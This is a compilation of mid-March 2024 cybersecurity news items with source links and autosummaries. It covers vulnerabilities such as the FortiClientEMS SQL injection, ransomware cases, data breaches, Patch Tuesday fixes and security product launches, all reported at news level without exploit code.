          2024-03-14 https://thehackernews.com/2024/03/fortinet-warns-of-severe-sqli.html
          Fortinet has warned of a critical security flaw impacting its FortiClientEMS software that could allow attackers to achieve code execution on affected systems. "An improper neutralization of special elements used in an SQL Command ("SQL Injection") vulnerability [CWE-89] in FortiClientEMS may allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted


          Tech support firms Restoro, Reimage fined $26 million for scare tactics

          industry
          2024-03-14 https://www.bleepingcomputer.com/news/security/tech-support-firms-restoro-reimage-fined-26-million-for-scare-tactics/
          Tech support companies Restoro and Reimage will pay $26 million to settle charges that they used scare tactics to trick their customers into paying for unnecessary computer repair services. [...]

          Autosummary: While the devices used to test the purchased software and services had no performance or security issues and were also running antivirus software, scanning them "revealed" hundreds of issues requiring repair, including "PC Privacy issues," "Junk files," "Crashed Programs," and "Broken Registry issues."


          Google Chrome gets real-time phishing protection later this month

          financial
          2024-03-14 https://www.bleepingcomputer.com/news/google/google-chrome-gets-real-time-phishing-protection-later-this-month/
          Google will roll out a Safe Browsing update later this month that will provide real-time malware and phishing protection to all Chrome users, without compromising their browsing privacy. [...]

          Autosummary: "Once the Safe Browsing server receives the encrypted hash prefixes from the privacy server, it decrypts the hash prefixes with its private key and then continues to check the server-side list."


          French unemployment agency data breach impacts 43 million people

          financial
          2024-03-14 https://www.bleepingcomputer.com/news/security/french-unemployment-agency-data-breach-impacts-43-million-people/
          France Travail, formerly known as Pôle Emploi, is warning that hackers breached its systems and may leak or exploit personal details of an estimated 43 million individuals. [...]


          Nissan confirms ransomware attack exposed data of 100,000 people

          exploits ransomware
          2024-03-14 https://www.bleepingcomputer.com/news/security/nissan-confirms-ransomware-attack-exposed-data-of-100-000-people/
          Nissan Oceania is warning of a data breach impacting 100,000 people after suffering a cyberattack in December 2023 that was claimed by the Akira ransomware operation. [...]

          Autosummary: Nissan's latest update confirms some of Akira's claims, admitting that hackers stole data on some current and former employees, as well as customers of Nissan, Mitsubishi, Renault, Skyline, Infiniti, LDV, and RAM dealerships in the region.


          LockBit affiliate jailed for almost four years after guilty plea

          ransomware
          2024-03-14 https://www.tripwire.com/state-of-security/lockbit-affiliate-jailed-almost-four-years-after-guilty-plea
          An affiliate of the LockBit ransomware gang has been sentenced to almost four years in jail after earlier pleading guilty to charges of cyber extortion and weapons charges. Read more in my article on the Tripwire State of Security blog.

          Autosummary: Investigators also discovered on Vasiliev's PC other evidence of his closeness to the LockBit ransomware gang: malicious source code, images of usernames and passwords, and screenshots of end-to-end encrypted conversations between Vasiliev and LockBit's mysterious administrator, LockBitSupp, discussing the extortion of victims.


          Perception Point GPThreat Hunter allows cybersecurity experts to focus on in-depth investigations

          ciber
          2024-03-14 https://www.helpnetsecurity.com/2024/03/14/perception-point-gpthreat-hunter/

          Perception Point launched its latest innovation, GPThreat Hunter, an addition to the company’s comprehensive security stack. Leveraging the capabilities of OpenAI’s GPT-4 model, GPThreat Hunter represents a significant leap forward in Perception Point’s ability to autonomously resolve complex security cases with accuracy and speed. Building on the accuracy of its proprietary detection layers that already successfully prevent 99.95% of threats, along with a vast dataset derived from years of human incident response expertise, Perception Point … More

          Autosummary: This development follows Perception Point’s continuous rollout of AI innovations, such as its release to combat advanced QR code phishing (AKA “Quishing”) threats, its GenAI Decoder, an LLM-based model for detecting social engineering attempts like BEC, impersonation and phishing, and more.


          Critical FortiClient EMS vulnerability fixed, (fake?) PoC for sale (CVE-2023-48788)

          exploits
          2024-03-14 https://www.helpnetsecurity.com/2024/03/14/cve-2023-48788-poc/

          A recently fixed SQL injection vulnerability (CVE-2023-48788) in Fortinet’s FortiClient Endpoint Management Server (EMS) solution has apparently piqued the interest of many: Horizon3’s Attack Team means to publish technical details and a proof-of-concept exploit for it next week, and someone is attempting to sell a PoC for less than $300 via GitHub. About CVE-2023-48788 CVE-2023-48788 is one of the several vulnerabilities recently patched by Fortinet. “An improper neutralization of special elements used in an SQL … More



          LockBit Ransomware Hacker Ordered to Pay $860,000 After Guilty Plea in Canada

          exploits ransomware
          2024-03-14 https://thehackernews.com/2024/03/lockbit-ransomware-hacker-ordered-to.html
          A 34-year-old Russian-Canadian national has been sentenced to nearly four years in jail in Canada for his participation in the LockBit global ransomware operation. Mikhail Vasiliev, an Ontario resident, was originally arrested in November 2022 and charged by the U.S. Department of Justice (DoJ) with "conspiring with others to intentionally damage protected computers and to transmit

          Autosummary: The development arrives as a federal jury in Washington, D.C., convicted Roman Sterlingov, a dual Russian-Swedish national, for his operation of Bitcoin Fog from 2011 through 2021, facilitating the laundering of profits made from the sale of illegal narcotics, computer crimes, stolen identities, and child sexual abuse material.


          Researchers Detail Kubernetes Vulnerability That Enables Windows Node Takeover

          exploits
          2024-03-14 https://thehackernews.com/2024/03/researchers-detail-kubernetes.html
          Details have been made public about a now-patched high-severity flaw in Kubernetes that could allow a malicious attacker to achieve remote code execution with elevated privileges under specific circumstances. “The vulnerability allows remote code execution with SYSTEM privileges on all Windows endpoints within a Kubernetes cluster,” Akamai security researcher Tomer Peled said. “To exploit

          Autosummary: It was addressed as part of updates released on November 14, 2023, in the following versions: kubelet v1.28.4, kubelet v1.27.8, kubelet v1.26.11, and kubelet v1.25.16. "A security issue was discovered in Kubernetes where a user that can create pods and persistent volumes on Windows nodes may be able to escalate to admin privileges on those nodes," Kubernetes maintainers said in an advisory released at the time.


          Nissan Oceania data breach impacted roughly 100,000 people

          financial
          2024-03-14 https://securityaffairs.com/160458/data-breach/nissan-oceania-data-breach-impacted-100000-people.html
          The ransomware attack that hit the systems of Nissan Oceania in December 2023 impacted roughly 100,000 individuals. Nissan Oceania, the regional division of the multinational carmaker, announced in December 2023 that it had suffered a cyber attack and launched an investigation into the incident. Nissan immediately notified the Australian Cyber Security Centre and the New […]

          Autosummary: Pierluigi Paganini, March 14, 2024.


          StopCrypt: Most widely distributed ransomware now evades detection

          exploits ransomware
          2024-03-14 https://www.bleepingcomputer.com/news/security/stopcrypt-most-widely-distributed-ransomware-now-evades-detection/
          A new variant of StopCrypt ransomware (aka STOP) was spotted in the wild, employing a multi-stage execution process that involves shellcodes to evade security tools. [...]

          Autosummary: Once the final payload is executed, a series of actions takes place to secure persistence for the ransomware, modify access control lists (ACLs) to deny users permission to delete important malware files and directories, and a scheduled task is created to execute the payload every five minutes.


          Cisco fixed high-severity elevation of privilege and DoS bugs

          exploits
          2024-03-14 https://securityaffairs.com/160489/security/cisco-ios-rx-flaws.html
          Cisco this week addressed high-severity elevation of privilege and denial-of-service (DoS) vulnerabilities in IOS XR software. Cisco addressed multiple vulnerabilities in IOS XR software, including three high-severity issues that can be exploited to elevate privileges and trigger a denial-of-service (DoS) condition. The vulnerability CVE-2024-20320 is a Cisco IOS XR Software SSH privilege escalation vulnerability. The […]

          Autosummary: Pierluigi Paganini, March 14, 2024.


          Recent DarkGate campaign exploited Microsoft Windows zero-day

          exploits
          2024-03-14 https://securityaffairs.com/160457/malware/recent-darkgate-campaign-exploited-microsoft-zero-day.html
          Researchers recently uncovered a DarkGate campaign in mid-January 2024 which exploited a Microsoft zero-day vulnerability. Researchers at the Zero Day Initiative (ZDI) recently uncovered a DarkGate campaign in mid-January 2024 which exploited the Windows zero-day flaw CVE-2024-21412 using fake software installers. CVE-2024-21412 (CVSS score 8.1) is an Internet Shortcut Files Security Feature Bypass Vulnerability. An unauthenticated attacker […]

          Autosummary: “The phishing campaign employed open redirect URLs from Google Ad technologies to distribute fake Microsoft software installers (.MSI) masquerading as legitimate software, including Apple iTunes, Notion, NVIDIA, and others,” reads the analysis published by Trend Micro. Pierluigi Paganini, March 14, 2024.


          StopCrypt: Most widely distributed ransomware evolves to evade detection

          exploits ransomware
          2024-03-14 https://www.bleepingcomputer.com/news/security/stopcrypt-most-widely-distributed-ransomware-evolves-to-evade-detection/
          A new variant of StopCrypt ransomware (aka STOP) was spotted in the wild, employing a multi-stage execution process that involves shellcodes to evade security tools. [...]

          Autosummary: Once the final payload is executed, a series of actions takes place to secure persistence for the ransomware, modify access control lists (ACLs) to deny users permission to delete important malware files and directories, and a scheduled task is created to execute the payload every five minutes.


          Threat intelligence explained | Unlocked 403: A cybersecurity podcast

          ciber
          2024-03-14 https://www.welivesecurity.com/en/videos/threat-intelligence-explained-unlocked-403-cybersecurity-podcast/
          We break down the fundamentals of threat intelligence and its role in anticipating and countering emerging threats.


          Keyloggers, spyware, and stealers dominate SMB malware detections

          exploits
          2024-03-13 https://www.helpnetsecurity.com/2024/03/13/smbs-ransomware-cyberthreat/

          In 2023, 50% of malware detections for SMBs were keyloggers, spyware and stealers, malware that attackers use to steal data and credentials, according to Sophos. Attackers subsequently use this stolen information to gain unauthorized remote access, extort victims, deploy ransomware, and more. Ransomware remains primary cyberthreat for SMBs The Sophos report also analyses initial access brokers (IABs)—criminals who specialize in breaking into computer networks. As seen in the report, IABs are using the dark web … More

          Autosummary: “There’s a reason that more than 90% of all cyberattacks reported to Sophos in 2023 involved data or credential theft, whether through ransomware attacks, data extortion, unauthorized remote access, or simply data theft,” added Budd.


          Stanford University announced that 27,000 individuals were impacted in the 2023 ransomware attack

          exploits ransomware
          2024-03-13 https://securityaffairs.com/160419/cyber-crime/stanford-university-data-breach.html
          Threat actors behind the ransomware attacks that hit Stanford University in 2023 gained access to 27,000 people. Stanford University confirmed that threat actors behind the September 2023 ransomware attack had access to 27,000 people. The prestigious US university was the victim of a ransomware attack carried out by the Akira ransomware group. The Akira ransomware gang claimed […]

          Autosummary: For a limited number of victims, threat actors had access to biometric data, health/medical information, email addresses with passwords, usernames with passwords, security questions and answers, digital signatures, and credit card information with security codes.


          LockBit ransomware affiliate gets four years in jail, to pay $860k

          exploits ransomware
          2024-03-13 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-affiliate-gets-four-years-in-jail-to-pay-860k/
          Russian-Canadian cybercriminal Mikhail Vasiliev has been sentenced to four years in prison by an Ontario court for his involvement in the LockBit ransomware operation. [...]

          Autosummary: Many of those victims, who had their systems paralyzed by Vasiliev between 2021 and 2022, were businesses based in Saskatchewan, Montreal, Newfoundland, and other Canadian states.


          Hackers target Roku: 15,000 accounts compromised in data breach

          financial
          2024-03-13 https://www.bitdefender.com/blog/hotforsecurity/hackers-target-roku-15-000-accounts-compromised-in-data-breach/
          Streaming company Roku has revealed that over 15,000 customers' accounts were hacked using stolen login credentials from unrelated data breaches. Read more in my article on the Hot for Security blog.

          Autosummary: "After gaining access, they then changed the Roku login information for the affected individual Roku accounts, and, in a limited number of cases, attempted to purchase streaming subscriptions," explained Roku.


          Alert: Cybercriminals Deploying VCURMS and STRRAT Trojans via AWS and GitHub

          exploits ciber
          2024-03-13 https://thehackernews.com/2024/03/alert-cybercriminals-deploying-vcurms.html
          A new phishing campaign has been observed delivering remote access trojans (RAT) such as VCURMS and STRRAT by means of a malicious Java-based downloader. “The attackers stored malware on public services like Amazon Web Services (AWS) and GitHub, employing a commercial protector to avoid detection of the malware,” Fortinet FortiGuard Labs researcher Yurren Wan said. An unusual aspect of the


          Acer Philippines disclosed a data breach after a third-party vendor hack

          financial
          2024-03-13 https://securityaffairs.com/160432/data-breach/acer-philippines-data-breach.html
          Acer Philippines disclosed a data breach after employee data was leaked by a threat actor on a hacking forum. Acer Philippines confirmed that employee data was compromised in an attack targeting a third-party service provider. Acer Inc. is a Taiwanese multinational company that produces computer hardware and electronics. Acer is investigating the security breach with the help […]

          Autosummary: Pierluigi Paganini, March 13, 2024.


          The effects of law enforcement takedowns on the ransomware landscape

          exploits ransomware
          2024-03-13 https://www.helpnetsecurity.com/2024/03/13/law-enforcement-action-ransomware/

          While the results of law enforcement action against ransomware-as-a-service operators Alphv/BlackCat and LockBit are yet to be fully realized, the August 2023 disruption of the Qakbot botnet has had one notable effect: ransomware affiliates have switched to vulnerability exploitation as the primary method of delivering the malware. The switch is obvious to Symantec’s Threat Hunter Team but, unfortunately, it hasn’t been accompanied by a fall in the number of ransomware victims. “Analysis of data from … More

          Autosummary: The researchers pointed out other current trends related to ransomware attacks: the attackers’ use of vulnerable drivers (e.g., for disabling security software), legitimate remote desktop tools (AnyDesk, Atera, etc.), custom data exfiltration tools (e.g., Lockbit’s StealBit), and abuse of built-in Windows utilities (e.g., Esentutl, DPAPI) to steal credentials.


          Demystifying a Common Cybersecurity Myth

          ciber
          2024-03-13 https://thehackernews.com/2024/03/demystifying-common-cybersecurity-myth.html
          One of the most common misconceptions in file upload cybersecurity is that certain tools are “enough” on their own—this is simply not the case. In our latest whitepaper OPSWAT CEO and Founder, Benny Czarny, takes a comprehensive look at what it takes to prevent malware threats in today’s ever-evolving file upload security landscape, and a big part of that is understanding where the

          Autosummary: Our emulation-based approach can swiftly de-obfuscate and dissect even the most complex, state-of-the-art, and environment-aware malware in under 15 seconds. Our MetaDefender Platform layers in market-leading and globally trusted technologies to form an easy to deploy, integrated-by-design, defense-in-depth cybersecurity strategy for securing file uploads. In our latest whitepaper OPSWAT CEO and Founder, Benny Czarny, takes a comprehensive look at what it takes to prevent malware threats in today's ever-evolving file upload security landscape, and a big part of that is understanding where the pitfalls are, and how to avoid them.


          PixPirate Android Banking Trojan Using New Evasion Tactic to Target Brazilian Users

          financial exploits latam
          2024-03-13 https://thehackernews.com/2024/03/pixpirate-android-banking-trojan-using.html
          The threat actors behind the PixPirate Android banking trojan are leveraging a new trick to evade detection on compromised devices and harvest sensitive information from users in Brazil. The approach allows it to hide the malicious app’s icon from the home screen of the victim’s device, IBM said in a technical report published today. “Thanks to this new technique, during PixPirate reconnaissance

          Autosummary: "Usually, the downloader is used to download and install the droppee, and from this point on, the droppee is the main actor conducting all fraudulent operations and the downloader is irrelevant," Somech explained.


          US govt probes if ransomware gang stole Change Healthcare data

          exploits ransomware
          2024-03-13 https://www.bleepingcomputer.com/news/security/us-govt-probes-if-ransomware-gang-stole-change-healthcare-data/
          The U.S. Department of Health and Human Services is investigating whether protected health information was stolen in a ransomware attack that hit UnitedHealthcare Group (UHG) subsidiary Optum, which operates the Change Healthcare platform, in late February. [...]

          Autosummary: Claims of 6TB data theft: the investigation follows the BlackCat ransomware gang's claims that they stole 6TB of data from Change Healthcare's network belonging to "thousands of healthcare providers, insurance providers, pharmacies, etc." They said they stole source code for Change Healthcare solutions and sensitive information from many partners, including the U.S. military's Tricare healthcare program, the Medicare federal health insurance program, CVS Caremark, MetLife, Health Net, and many other healthcare insurance providers.


          Fortinet warns of critical RCE bug in endpoint management software

          exploits
          2024-03-13 https://www.bleepingcomputer.com/news/security/fortinet-warns-of-critical-rce-bug-in-endpoint-management-software/
          Fortinet patched a critical vulnerability in its FortiClient Enterprise Management Server (EMS) software that can allow attackers to gain remote code execution (RCE) on vulnerable servers. [...]


          PixPirate Android malware uses new tactic to hide on phones

          exploits
          2024-03-13 https://www.bleepingcomputer.com/news/security/pixpirate-android-malware-uses-new-tactic-to-hide-on-phones/
          The latest version of the PixPirate banking trojan for Android employs a previously unseen method to hide from the victim while remaining active on the infected device even if its dropper app has been removed. [...]

          Autosummary: This downloader app requests access to risky permissions upon installation, including Accessibility Services, and then proceeds to download and install the second app (named "droppee"), which is the encrypted PixPirate banking malware.


          Fortinet fixes critical bugs in FortiOS, FortiProxy, and FortiClientEMS

          exploits
          2024-03-13 https://securityaffairs.com/160440/security/fortinet-critical-bugs-fortios-fortiproxy-forticlientems.html
          Fortinet released security updates to address critical code execution vulnerabilities in FortiOS, FortiProxy, and FortiClientEMS. Fortinet this week has released security updates to fix critical code execution vulnerabilities in FortiOS, FortiProxy, and FortiClientEMS. The first vulnerability is an out-of-bounds write issue, tracked as CVE-2023-42789 (CVSS score 9.3); it can be exploited to execute unauthorized code […]


          Hackers exploit Windows SmartScreen flaw to drop DarkGate malware

          exploits
          2024-03-13 https://www.bleepingcomputer.com/news/security/hackers-exploit-windows-smartscreen-flaw-to-drop-darkgate-malware/
          A new wave of attacks by the DarkGate malware operation exploits a now-fixed Windows Defender SmartScreen vulnerability to bypass security checks and automatically install fake software installers. [...]

          Autosummary: The complex and multi-step infection chain employed by DarkGate operators since mid-January 2024 is summarized in a diagram (DarkGate infection chain; source: Trend Micro). Trend Micro says this campaign employs DarkGate version 6.1.7, which, compared to the older version 5, features XOR-encrypted configuration, new config options, and updates on the command and control (C2) values.


          Malwarebytes Premium blocks 100% of malware during external AVLab test

          exploits
          2024-03-13 https://www.malwarebytes.com/blog/news/2024/03/malwarebytes-premium-blocks-100-of-malware-during-external-avlab-test
          Malwarebytes Premium for Windows detected and blocked 100% of the malware samples used in AVLab's January evaluation.

          Autosummary: Malwarebytes Premium earned a perfect score in the latest AVLab Cybersecurity Foundation “Advanced In-The-Wild Malware Test,” catching and stopping 100% of malware samples, outperforming multiple competitors in the field, and continuing a longstanding tradition of proven, perfect protection for users.


          Image-based phishing tactics evolve

          financial industry
          2024-03-12 https://www.helpnetsecurity.com/2024/03/12/image-based-phishing-attacks/

          While 70% of organizations feel their current security stacks are effective against image-based and QR code phishing attacks, 76% were still compromised in the last 12 months, according to IRONSCALES and Osterman Research. IT pros are highly aware of emerging types of phishing attacks 93% of IT and security professionals are aware of image-based phishing attacks targeting their organizations, and 79% say the same about QR code attacks. 76% of organizations were still compromised by … More

          Autosummary: IT pros are highly aware of emerging types of phishing attacks: 93% of IT and security professionals are aware of image-based phishing attacks targeting their organizations, and 79% say the same about QR code attacks.


          AuditBoard unveils AI, analytics, and annotation capabilities to deliver more timely insights

          industry
          2024-03-12 https://www.helpnetsecurity.com/2024/03/12/auditboard-ai/

          AuditBoard revealed powerful new AI, analytics, and annotation capabilities to help corporate risk, compliance, and assurance teams, including internal audit and SOX functions, improve collaboration with stakeholders, do more with less, and deliver more timely insights. These robust new enhancements to the internal audit, SOX, and controls management capabilities of AuditBoard’s modern connected risk platform deliver relevant insights faster while navigating a dynamic market environment rife with increasing risks, regulations, and business requirements: AuditBoard AI … More



          How advances in AI are impacting business cybersecurity

          ciber
          2024-03-12 https://www.helpnetsecurity.com/2024/03/12/interactive-ai-business-security/

          While ChatGPT and Bard have proven to be valuable tools for developers, marketers, and consumers, they also carry the risk of unintentionally exposing sensitive and confidential data. From a security point of view, it always pays to think one step ahead and about what might be coming next. One of the latest breakthroughs in AI technology is “interactive AI”. While generative AI tools can create fresh content, write code, perform calculations, and engage in human-like … More

          Autosummary: While generative AI tools can create fresh content, write code, perform calculations, and engage in human-like conversations, interactive AI can be used for tasks like geolocation and navigation or speech-to-text applications, ushering in the next phase of chatbots and digital assistants. Identifying and understanding how data is stored, used, and moves across an organization, and controlling who has access to that data, ensures security teams can quickly respond to threats such as unauthorized access to sensitive data.


          Cybersecurity jobs available right now: March 12, 2024

          ciber
          2024-03-12 https://www.helpnetsecurity.com/2024/03/12/cybersecurity-jobs-available-right-now-march-12-2024/

          CISO / Head of Enterprise IT Stitch Fix | USA | Remote – View job details Reporting directly to the Chief Product and Technology Officer, you will oversee all aspects of information security, including cloud security, DevSecOps, security operations, and security strategy. You’ll also be responsible for all areas of the IT organization, including IT infrastructure, enterprise applications and insights, business systems, employee technology services, and IT analytics. CISO Ultra Maritime | USA | Remote … More

          Autosummary: CISO / Head of Enterprise IT Stitch Fix | USA | Remote – View job details Reporting directly to the Chief Product and Technology Officer, you will oversee all aspects of information security, including cloud security, DevSecOps, security operations, and security strategy. Junior-Regular Security Analyst Luxoft Poland | Poland | Hybrid – View job details As a Data Security Analyst, you will serve as an expert in detection, collaborating with the CTO, information security, and customer’s group SOC.


          Tax-related scams escalate as filing deadline approaches

          financial
          2024-03-12 https://www.helpnetsecurity.com/2024/03/12/tax-scams/

          As the April 15, 2024 tax filing deadline approaches in the US, some old and some new tax-related scams are targeting both taxpayers and tax professionals. Tax-related scams targeting taxpayers: with taxpayers rushing to file their personal federal income tax return, scammers are taking advantage of the commotion to trick people into sending them money or handing out sensitive private information. The Internal Revenue Service (IRS) is warning taxpayers about common IRS impersonation scams, but also … More

          Autosummary: To protect themselves from tax-related scams, taxpayers are advised to: request an Identity Protection PIN before filing the tax return; make sure to access the legitimate IRS website; share personal information only through encrypted channels; only use legitimate tax software and tax preparation services; create strong passwords; enable multi-factor authentication (MFA); and promptly report tax-related schemes, scams, identity theft and fraud. The IRS stresses that they will never ask for personal/financial information or Identity Protection PINs through email, text or social media, and will never threaten with lawsuits or arrests. Some additional tax-related scams the IRS is warning about: tax identity theft (scammers use a person’s identity number to file a tax return or unemployment compensation and claim refunds); phishing scams (scammers send convincing emails posing as the IRS to make victims disclose personal and financial information); and unethical tax return preparers (aka “ghost” tax preparers), individuals that pose as tax preparers but don’t actually file tax returns on behalf of the taxpayer despite getting paid for the service.


          Hackers leverage 1-day vulnerabilities to deliver custom Linux malware

          exploits Linux
          2024-03-12 https://www.helpnetsecurity.com/2024/03/12/custom-linux-malware/

          A financially motivated threat actor is using known vulnerabilities to target public-facing services and deliver custom malware to unpatched Windows and Linux systems. Among the exploited vulnerabilities are also two recently discovered Ivanti Connect Secure VPN flaws that are widely exploited by a variety of attackers. Magnet Goblin activity Magnet Goblin – as the threat actor has been dubbed by Check Point researchers – has been targeting unpatched edge devices and public-facing servers for years. … More

          The post Hackers leverage 1-day vulnerabilities to deliver custom Linux malware appeared first on Help Net Security.




          CTEM 101 - Go Beyond Vulnerability Management with Continuous Threat Exposure Management

          exploits ransomware
          2024-03-12 https://thehackernews.com/2024/03/ctem-101-go-beyond-vulnerability.html
          In a world of ever-expanding jargon, adding another FLA (Four-Letter Acronym) to your glossary might seem like the last thing you’d want to do. But if you are looking for ways to continuously reduce risk across your environment while making significant and consistent improvements to security posture, in our opinion, you probably want to consider establishing a Continuous Threat Exposure

          Autosummary: With CTEM, a more thoughtful approach to discovery and prioritization adds value by:
          - Quickly reducing overall risk
          - Increasing the value of each remediation, and potentially freeing up resources
          - Improving the alignment between security and IT teams
          - Providing a common view into the entire process, encouraging a positive feedback loop that drives continuous improvement
          Getting Started with CTEM: Since CTEM is a process rather than a specific service or software solution, getting started is a holistic endeavor. The Five Stages of a CTEM Program: Rather than a particular product or service, CTEM is a program that reduces cyber security exposures via five stages. Scoping – According to Gartner, "To define and later refine the scope of the CTEM initiative, security teams need first to understand what is important to their business counterparts, and what impacts (such as a required interruption of a production system) are likely to be severe enough to warrant collaborative remedial effort." In our opinion, a CTEM program helps you:
          - Identify your most exposed assets, along with how an attacker might leverage them
          - Understand the impact and likelihood of potential breaches
          - Prioritize the most urgent risks and vulnerabilities
          - Get actionable recommendations on how to fix them
          - Monitor your security posture continuously and track your progress
          With a CTEM program, you can get the "attacker's view", cross-referencing flaws in your environment with their likelihood of being used by an attacker.


          Malware Campaign Exploits Popup Builder WordPress Plugin to Infect 3,900+ Sites

          exploits
          2024-03-12 https://thehackernews.com/2024/03/malware-campaign-exploits-popup-builder.html
          A new malware campaign is leveraging a high-severity security flaw in the Popup Builder plugin for WordPress to inject malicious JavaScript code. According to Sucuri, the campaign has infected more than 3,900 sites over the past three weeks. "These attacks are orchestrated from domains less than a month old, with registrations dating back to February 12th, 2024," security researcher

          Autosummary: The cross-site scripting (XSS) flaw, tracked as CVE-2024-2123 (CVSS score: 7.2), impacts all versions of the plugin, including and prior to 2.8.3.


          Insurance scams via QR codes: how to recognise and defend yourself

          financial
          2024-03-12 https://securityaffairs.com/160392/cyber-crime/insurance-scams-via-qr-codes.html
          Threat actors can abuse QR codes to carry out sophisticated scams, as reported by the Italian Postal Police in its recent alert. As is well known, QR codes are two-dimensional barcodes that can be read with a smartphone or other hand-held device. They are widely used to access information, services, or online payments quickly and […]

          Autosummary: Following this, the fake insurer, refusing other methods of payment on the pretext of security reasons, provides a payment slip with a QR code containing the payment details. The slip is generated through legitimate circuits distributed throughout the country at authorised points of sale, but the beneficiary’s details are in the name of a natural person and not a real insurance agency.


          Rubrik EPE secures enterprise data from cyberattacks

          ciber
          2024-03-12 https://www.helpnetsecurity.com/2024/03/12/rubrik-epe/

          Artificial intelligence (AI), digital transformation, and the Internet of Things have caused a data explosion, leading organizations to grapple with a surging amount of fragmented data where it lives. Rubrik released Rubrik Enterprise Proactive Edition (EPE), a data security product suite that combines DSPM with recovery designed for complete cyber resilience, wherever data lives. Rubrik EPE allows organizations to secure mission-critical data for comprehensive protection, recovery, and resilience against tomorrow’s cyberattacks, whether in a cloud, … More

          The post Rubrik EPE secures enterprise data from cyberattacks appeared first on Help Net Security.


          Autosummary: Core capabilities include:
          - Providing comprehensive visibility across a hybrid environment, from cloud and SaaS to data centers
          - Monitoring data assets to identify sensitive data, protection levels, and user access policies
          - Delivering insight into activities taken on those data sets
          - Discovering misconfigurations for IT and security teams to correct, and thereby reduce inadvertent data exposure
          “Cyber threats have outpaced most companies’ ability to prevent them.”


          Claroty Advanced ATD Module provides continuous monitoring of healthcare network risks

          ransomware
          2024-03-12 https://www.helpnetsecurity.com/2024/03/12/claroty-advanced-atd-module/

          Claroty released Advanced Anomaly Threat Detection (ATD) Module within the Medigate Platform from Claroty. The new capability provides healthcare organizations with the clinical context to properly identify, assess, and prioritize threats to connected medical devices, IoT, and building management systems (BMS). The capabilities of the Advanced ATD Module are built on Claroty’s specialized knowledge of healthcare environments and foundational, in-depth CPS device visibility, including: Agentless, clinically-aware threat detection and context to address known indicators of … More

          The post Claroty Advanced ATD Module provides continuous monitoring of healthcare network risks appeared first on Help Net Security.


          Autosummary: The capabilities of the Advanced ATD Module are built on Claroty’s specialized knowledge of healthcare environments and foundational, in-depth CPS device visibility, including:
          - Agentless, clinically-aware threat detection and context to address known indicators of compromise in CPS
          - Threat detection at deeper levels of the clinical network beyond areas where firewall solutions are deployed
          - Continuous monitoring of device communication hardening measures and compliance controls
          According to the Germany-based healthcare network Ortenau Klinikum, with the Advanced ATD Module, “We now know what is in our network at any given minute.”


          Stanford: Data of 27,000 people stolen in September ransomware attack

          exploits ransomware
          2024-03-12 https://www.bleepingcomputer.com/news/security/stanford-data-of-27-000-people-stolen-in-september-ransomware-attack/
          Stanford University says the personal information of 27,000 individuals was stolen in a ransomware attack impacting its Department of Public Safety (SUDPS) network. [...]



          Microsoft March 2024 Patch Tuesday fixes 60 flaws, 18 RCE bugs

          exploits
          2024-03-12 https://www.bleepingcomputer.com/news/microsoft/microsoft-march-2024-patch-tuesday-fixes-60-flaws-18-rce-bugs/
          Today is Microsoft’s March 2024 Patch Tuesday, and security updates have been released for 60 vulnerabilities, including eighteen remote code execution flaws. [...]

          Autosummary: The number of bugs in each vulnerability category is listed below:
          - 24 Elevation of Privilege Vulnerabilities
          - 3 Security Feature Bypass Vulnerabilities
          - 18 Remote Code Execution Vulnerabilities
          - 6 Information Disclosure Vulnerabilities
          - 6 Denial of Service Vulnerabilities
          - 2 Spoofing Vulnerabilities
          The total count of 60 flaws does not include 4 Microsoft Edge flaws fixed on March 7th.


          Google paid $10 million in bug bounty rewards last year

          exploits
          2024-03-12 https://www.bleepingcomputer.com/news/google/google-paid-10-million-in-bug-bounty-rewards-last-year/
          Google awarded $10 million to 632 researchers from 68 countries in 2023 for finding and responsibly reporting security flaws in the company’s products and services. [...]

          Autosummary: During security conferences like ESCAL8 and hardwea.io, Google awarded $70,000 for 20 critical discoveries in Wear OS and Android Automotive OS and another $116,000 for 50 reports concerning issues in Nest, Fitbit, and Wearables.


          Ransomware review: March 2024

          exploits
          2024-03-12 https://www.malwarebytes.com/blog/threat-intelligence/2024/03/ransomware-review-march-2024
          February 2024 is likely to be remembered as one of the most turbulent months in ransomware history.

          Autosummary: [Charts: Known ransomware attacks by gang, by country, and by industry sector, February 2024.] But February didn’t just bring unprecedented numbers, but unprecedented developments as well: law enforcement shut down LockBit, the largest ransomware gang, while ALPHV, the second-largest, appeared to fake its demise and abscond with its own affiliates’ funds. There was substance to the disruption too: some arrests, “a vast amount of intelligence” gathered, infrastructure seized, cryptocurrency accounts frozen, decryption keys captured, and the revelation that LockBit administrator LockBitSupp “has engaged with law enforcement.” In other February news, new reports highlighted ALPHV’s surge of targeted attacks against the healthcare sector. “Threats to leak data, sell it online, break other parts of the business, attack related firms, or even harass employees are all tactics gangs can make use of” to force reluctant businesses to pay, writes former Malwarebytes Labs author Christopher Boyd.


          March 2024 Patch Tuesday: Microsoft fixes critical bugs in Windows Hyper-V

          exploits
          2024-03-12 https://www.helpnetsecurity.com/2024/03/12/march-2024-patch-tuesday/

          On this March 2024 Patch Tuesday, Microsoft has released fixes for 59 CVE-numbered vulnerabilities, but – welcome news! – none of them are currently publicly known or actively exploited. Last month, though, several days after Patch Tuesday, the company updated two advisories to say that those particular vulnerabilities were being exploited in the wild. One of the two – CVE-2024-21338, an elevation of privilege vulnerability affecting the Windows Kernel – had been reported to Microsoft … More

          The post March 2024 Patch Tuesday: Microsoft fixes critical bugs in Windows Hyper-V appeared first on Help Net Security.


          Autosummary: “These mostly include elevation of privilege vulnerabilities including CVE-2024-26182 (Windows Kernel), CVE-2024-26170 (Windows Composite Image File System), CVE-2024-21437 (Windows Graphics Component), and CVE-2024-21433 (Windows Print Spooler), which we often see exploited in the wild as zero-days as part of post-exploitation activity, typically by advanced persistent threat (APT) groups,” he pointed out.


          Election cybersecurity: Protecting the ballot box and building trust in election integrity

          ciber
          2024-03-12 https://www.welivesecurity.com/en/critical-infrastructure/election-cybersecurity-protecting-ballot-box-building-trust-election-integrity/
          What cyberthreats could wreak havoc on elections this year and how worried should we as voters be about the integrity of our voting systems?

          Autosummary: They include assertions that:
          - election officials regularly update voter registration lists to ensure they’re as accurate and current as possible
          - various security measures exist to protect the integrity of mail-in ballots, including voter identity checks
          - there are robust safeguards to protect against tampering with ballots returned via drop box
          - federal, state, and/or local election authorities rigorously test and certify voting machines and equipment for vulnerabilities
          - signature matching, information checks and other measures are designed to protect against voter impersonation and ineligible voters casting a ballot
